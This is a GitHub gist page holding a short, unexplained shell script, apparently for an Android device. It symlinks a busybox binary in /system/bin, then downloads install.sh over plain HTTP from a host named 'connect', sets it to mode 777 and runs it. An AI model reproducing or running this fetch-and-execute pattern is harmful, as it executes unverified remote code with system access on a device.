Created
April 11, 2016 18:14
-
-
Save ArseniyShestakov/73dc60824038ae2b1a831428a11d9163 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
busybox chmod +x /system/bin/b2 | |
busybox ln -s /system/bin/b2 /system/bin/ash | |
busybox ln -s /system/bin/b2 /system/bin/wget | |
busybox ln -s /system/bin/b2 /system/bin/ping | |
busybox ln -s /system/bin/b2 /system/bin/awk | |
wget -O /cache/install.sh http://connect/_2/server/install.sh | |
chmod 777 /cache/install.sh | |
/cache/install.sh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment